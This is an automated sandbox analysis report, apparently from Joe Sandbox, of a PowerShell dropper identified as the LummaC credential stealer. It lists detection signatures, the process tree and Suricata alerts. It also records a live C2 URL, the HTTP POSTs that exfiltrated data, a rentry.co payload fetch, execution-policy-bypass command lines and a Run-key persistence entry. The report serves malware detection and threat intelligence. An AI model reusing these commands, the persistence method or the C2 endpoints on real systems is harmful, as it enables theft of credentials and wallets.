
Windows Analysis Report
bUAmCazc.ps1

Overview

General Information

Sample name: bUAmCazc.ps1
Analysis ID: 1565310
MD5: fa478f449dec7d97732bf290fd92b7bc
SHA1: c08ed5100f487fe29245af63c388ead0b0e7b461
SHA256: b352201272b66562cea2dda2ec8b6aa1a5b0718f794c9f7c75c74cbdce4e6d1b
Tags: ps1, user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to evade analysis by execution special instruction (VM detection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • powershell.exe (PID: 6328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Setup.exe (PID: 6476 cmdline: "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe" MD5: B6F6C3C38568EE26F1AC70411A822405)
      • Setup.exe (PID: 5460 cmdline: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe MD5: 7FB44C5BCA4226D8AAB7398E836807A2)
      • more.com (PID: 2144 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
        • conhost.exe (PID: 4480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msiexec.exe (PID: 5544 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • powershell.exe (PID: 4144 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 736 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • Setup.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe" MD5: B6F6C3C38568EE26F1AC70411A822405)
  • cleanup
{"C2 url": "https://balloon-sneak.cyou/api", "Build Version": "MeHdy4--pl8vs07"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000003.2399976992.0000000003406000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: msiexec.exe PID: 5544 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: msiexec.exe PID: 5544 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
Process Memory Space: msiexec.exe PID: 5544 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5544, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", ProcessId: 4144, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5544, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1", ProcessId: 4144, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", ProcessId: 6328, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6328, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
Source: Network Connection | Author: frack113 | Data: DestinationIp: 172.67.170.85, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6328, TargetFilename: C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dll
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1", ProcessId: 6328, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:45:51.132831+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 172.67.170.85 | 443 | TCP
2024-11-29T15:45:55.504840+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 172.67.170.85 | 443 | TCP
2024-11-29T15:46:00.312055+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 172.67.170.85 | 443 | TCP
2024-11-29T15:46:04.505532+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 172.67.170.85 | 443 | TCP
2024-11-29T15:46:09.082469+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49758 | 172.67.170.85 | 443 | TCP
2024-11-29T15:46:13.869083+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49771 | 172.67.170.85 | 443 | TCP
2024-11-29T15:46:18.572183+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49783 | 172.67.170.85 | 443 | TCP
2024-11-29T15:46:24.527434+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49795 | 172.67.170.85 | 443 | TCP
2024-11-29T15:46:29.110776+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49806 | 104.26.2.16 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:45:54.094934+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 172.67.170.85 | 443 | TCP
2024-11-29T15:45:58.553704+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 172.67.170.85 | 443 | TCP
2024-11-29T15:46:27.314353+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49795 | 172.67.170.85 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:45:54.094934+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 172.67.170.85 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:45:58.553704+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 172.67.170.85 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:46:16.481366+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49771 | 172.67.170.85 | 443 | TCP


AV Detection

Source: 11.2.msiexec.exe.3295f08.1.unpack | Malware Configuration Extractor: LummaC {"C2 url": "https://balloon-sneak.cyou/api", "Build Version": "MeHdy4--pl8vs07"}
Source: bUAmCazc.ps1 | ReversingLabs: Detection: 15%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\eqoamnqfg | Joe Sandbox ML: detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dll
Source: unknown | HTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb | source: powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, NAudio.dll.0.dr
Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\cefSubProcess\pc64-vc-tool-opt\bin\EACefSubProcess.pdb | source: Updater.ex.0.dr
Source: Binary string: wntdll.pdbUGP | source: Setup.exe, 00000003.00000002.1938482708.0000000003614000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937911745.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1938160688.0000000003260000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000007.00000002.2193366185.0000000005330000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000007.00000002.2185097182.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580786924.0000000004CF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2581036694.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210939442.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2211064893.0000000003230000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Setup.exe, 00000003.00000002.1938482708.0000000003614000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937911745.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1938160688.0000000003260000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000007.00000002.2193366185.0000000005330000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000007.00000002.2185097182.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580786924.0000000004CF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2581036694.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210939442.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2211064893.0000000003230000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do | source: powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, NAudio.dll.0.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-x64-cygwin-sans-NAS\jdk8u381\237\build\windows-x64\jdk\objs\javaw_objs\javaw.pdb | source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000006.00000000.1932096504.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | Code function: 6_2_00007FF764A31F90 FindFirstFileExW, 6_2_00007FF764A31F90
Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | Code function: 6_2_00007FF764A17A9C FindFirstFileA, FindNextFileA, FindClose, 6_2_00007FF764A17A9C

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49771 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49795 -> 172.67.170.85:443
Source: Malware configuration extractor | URLs: https://balloon-sneak.cyou/api
Source: unknown | DNS query: name: rentry.co
Source: Joe Sandbox View | IP Address: 104.26.2.16
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49783 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49795 -> 172.67.170.85:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 104.26.2.16:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: balloon-sneak.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 49 | Host: balloon-sneak.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=1EO9KR8T3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18111 | Host: balloon-sneak.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=38KS5A4HANM6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8750 | Host: balloon-sneak.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QHZY9VZIKCL5L | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20409 | Host: balloon-sneak.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=W72OX4OUIQ3F8WYSF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1237 | Host: balloon-sneak.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XMVUGMOX0EZFEHT | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 476224 | Host: balloon-sneak.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 84 | Host: balloon-sneak.cyou
Source: global traffic | HTTP traffic detected: GET /feouewe5/raw HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: rentry.co
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /feouewe5/raw HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: rentry.co
Source: global traffic | DNS traffic detected: DNS query: balloon-sneak.cyou
Source: global traffic | DNS traffic detected: DNS query: rentry.co
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: balloon-sneak.cyou
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Fri, 29 Nov 2024 14:46:29 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 8793 | Connection: close | Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA | Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA | Cross-Origin-Embedder-Policy: require-corp | Cross-Origin-Opener-Policy: same-origin | Cross-Origin-Resource-Policy: same-origin | Origin-Agent-Cluster: ?1 | Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | Referrer-Policy: same-origin | X-Content-Options: nosniff | X-Frame-Options: SAMEORIGIN | cf-mitigated: challenge
Source: Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://c0rl.m%L
Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: powershell.exe, 00000000.00000002.1992948747.000001AD685A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD68654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp, Updater.ex.0.dr, NAudio.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
